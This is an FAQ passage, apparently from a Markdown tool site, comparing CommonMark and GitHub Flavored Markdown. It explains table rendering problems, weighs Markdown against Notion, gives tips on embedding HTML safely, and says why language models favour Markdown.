CommonMark is a formal specification, first published in 2014, that standardizes the original Markdown, which left many edge cases ambiguous. GitHub Flavored Markdown (GFM) is a superset of CommonMark: it adds tables, strikethrough (~~), task lists (- [x]), and extended autolinks, plus a filter for a few dangerous raw HTML tags. GFM is the most widely used Markdown dialect in 2026, but its extensions are not universally supported outside Git platforms. If you're targeting GitHub, aim for GFM. For maximum portability, stick to CommonMark only.

My Markdown table is not rendering — why?

Tables are part of GFM, not base CommonMark. If your parser uses a minimalist implementation (original Markdown, plain cmark), the table is not recognized and its rows appear as ordinary text with literal pipes. Check that your tool supports GFM or enable the corresponding extension (e.g., marked.use({ gfm: true }) in JavaScript). Another frequent cause is a malformed separator line: it must have the same number of cells as the header row, and GitHub's documentation asks for at least three dashes per cell. Test your syntax with our Markdown converter.

Markdown or Notion: which to choose for note-taking in 2026?

Notion is excellent for team collaboration and visual databases, but its files are proprietary — the Markdown export remains unreliable for complex content. Markdown in Obsidian, Logseq, or VS Code gives you portable .md files, readable without any tool, and versionable with git. In 2026, the trend is clear: Markdown-first tools are gaining ground for personal PKM. If data ownership and a 10-year lifespan are criteria, choose Markdown. If real-time collaboration and visual databases matter most in a professional context, Notion remains a solid choice.

How do I embed HTML in Markdown without breaking the render?

CommonMark allows raw HTML inside Markdown files. Two rules to follow: leave a blank line before and after your HTML block to prevent it from being merged with surrounding Markdown, and don't nest Markdown inside HTML tags (most parsers won't render it). Security note: if HTML content from third-party users is rendered without precautions, you expose your site to XSS attacks. Always use html: false in markdown-it or DOMPurify on the produced HTML for any externally sourced content.

Why has Markdown become the preferred format for LLMs?

Large language models (ChatGPT, Claude, Gemini) produce Markdown by default because its textual syntax is massively represented in their training corpora (GitHub, Stack Overflow, open-source docs). Markdown encodes semantic structure — headings, lists, code — without HTML's verbosity or LaTeX's complexity, which models learn to reproduce naturally. In 2026, Markdown has established itself as the lingua franca between humans and AI, both for conversational exchanges and for RAG pipelines and autonomous agent systems.